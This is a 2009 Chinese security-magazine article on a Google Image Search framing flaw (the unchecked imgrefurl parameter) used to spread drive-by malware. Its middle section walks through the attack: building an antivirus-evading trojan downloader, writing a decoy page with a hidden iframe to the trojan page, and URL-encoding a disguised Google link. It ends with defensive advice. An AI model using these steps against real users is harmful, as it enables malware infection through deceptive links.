图片搜索 暗藏挂马黑手

安全阵线

辽宁 王海瑞 · 2009年4月20日 第15期

你用过谷歌的图片搜索没有?别人发给你一个谷歌图片搜索的链接你会点击吗?在看本文之前,你可能会毫不犹豫点击。在看了本文之后,你就要慎重了。为什么这样说呢?因为谷歌图片搜索存在挂马漏洞,且正在被广泛利用。

我看了上期F6版的《过滤不严 QQ绿盾成摆设》,做了几次实验,发现这种方法存在缺陷,用户打开的网页就是挂马网页,很容易就引起用户的警觉了。在实验时,我无意中发现谷歌图片搜索存在一个挂马漏洞。

在跟一些朋友交流后,得知自己不是第一个发现这个漏洞的,该漏洞被人用来挂马已经有一两个月的时间了。利用谷歌图片搜索制作的恶意链接,跟上期文章伪造的链接非常相似(图1),但迷惑性更强。

15-f07-01.jpg

小提示:上期介绍的地址伪装方法,是在一些知名网站的特定链接后面的参数中加上挂马的网址,访问这个伪装的网址后就跳转到参数后面的挂马网址,例如http://pro.163.com/56113830/../event.ng/Type=&Redirect=http://www.52cmd.cn表面看上去是163.com的二级域名,但是打开之后就会跳转到http://www.52cmd.cn。

这种链接是利用跨站制作出来的,就是将imgrefurl=后面的网址嵌入当前网页。打开图片搜索网页后直接在当前页面显示目标网页,如果这个目标网页是挂马网页会怎么样?访问该图片搜索网页的用户可能中毒,而他们根本不会察觉自己无意中打开了挂马网页(图2)。

15-f07-02.jpg
15-f07-03.jpg

图片搜索挂马之谜

谷歌图片搜索,是将图片来源的页面嵌套到自己的页面,以http://images.google.cn/imgres?imgurl=http://www.xpdesk.cn/Code/upload88/Pro1/xpdesk.cn2007731131852875b.jpg&imgrefurl=http://www.xpdesk.cn/pro/Pro1/ProList1134.html为例,我们看到这个链接中“imgres?”后面跟了两个参数“imgurl=”和“imgrefurl=”。

imgurl=后面跟的是图片的地址,imgrefurl=后面根据语意能猜出是图片来源地址。问题就出在这个图片来源地址上,将imgrefurl=后面的地址改成http://baidu.com,很囧的事发生了,谷歌把百度嵌套进了自己的页面(图3)。

15-f07-04.jpg

看来原因被我找到了,是谷歌图片搜索的本身缺陷,对链接中参数imgrefurl=后面的图片来源地址没有做任何校验,直接将来源页面嵌套进来。如果被用来进行欺骗挂马也是轻而易举的事情。

究其本质原因,是谷歌图片搜索直接将图片来源网页框架嵌入了谷歌的图片搜索结果页面,没有对这个图片来源网址做任何安全性校验就显示出来了。这样就给挂马者留下了可钻的缝隙。

这种挂马的好处就是迷惑性非常强。这就好比你相信大型百货公司不会销售假货,造假者在给大型百货公司提供货源时,偷偷塞进去一些假货,你可能无意中就在大型百货公司买到假货。

用图片搜索挂马

第一步:先制作一个免杀的木马下载者服务端(程序运行后会从指定的网站下载大量木马),之后用《终极网页木马生成器》生成脚本网页木马(图4),将生成的网页木马上传到指定的网站空间里。

15-f07-05.jpg

第二步:制作伪装页面。由于利用的是图片搜索页面,打开的页面中一定要有图片。事先制作一个简单的网页,既包含图片又包含挂马代码。挂马代码如下:

<html>

<head>

<title>无标题 1</title>

</head>

<body>

<img alt=" " src="伪装的图片链接地址” /> <!——代码的作用是伪装图片地址——>

<iframe src="木马网页的地址" /> <!——代码的作用是嵌入挂马网页—— >

</body>

</html>

将上述代码写在记事本中另存为xxx.htm,之后上传到指定的网页空间,这里假设地址是http://www.xxxx.com/1.htm,不知情的用户打开这个页面就会中招。有警觉的人不会直接打开一个陌生的链接的。

第三步:进行欺骗攻击。将图片搜索链接改成:http://images.google.cn/imgres?imgurl=大美女.jpg&imgrefurl= http://www.xxxx.com/1.htm。imgref后面的链接就是挂马的地址,虽然看上去是谷歌图片搜索的地址,但是打开后会在页面中执行http://www.xxxx.com/1.htm这个链接中的所有代码。

不过这样看上去还是有些明显,看了上期《过滤不严 QQ绿盾成摆设》一文的人都可以识破这样的陷阱。这就需要对URL进行加密处理,把http://www.xxxx.com/1.htm加密成图6中的字符串(图5)。

15-f07-06.jpg

这样地址就变成了http://images.google.cn/imgres?imgurl=大美女.jpg&imgrefurl=%68%74%74%70%3A%2F%2F%77%77%77%2E%78%78%78%78%2E%63%6F%6D%2F%31%2E%68%74%6D,看上去毫无破绽。挂马者把这个链接附加上迷惑性的文字发出去,引诱用户点击。如果点击了,就会激活挂马页面,导致电脑中毒。

防范技巧

大家要学会如何辨别网址,例如vip.qq.vnhdr.com,乍一看以为是QQ会员的网址,其实三级域名vnhdr.com才是主域名。网址后面如果有“url=”这样的参数,就特别可疑,最好不要打开。

此外,我们还要及时打上系统和常用软件的安全补丁,上网时使用一些能拦截网页木马的安全辅助工具。谷歌图片搜索在抓取图片的时候,应该对图片来源网址做过滤验证,这样如果图片来源网址被更改成其他网址时就会拒绝访问,挂马者就无法兴风作浪了。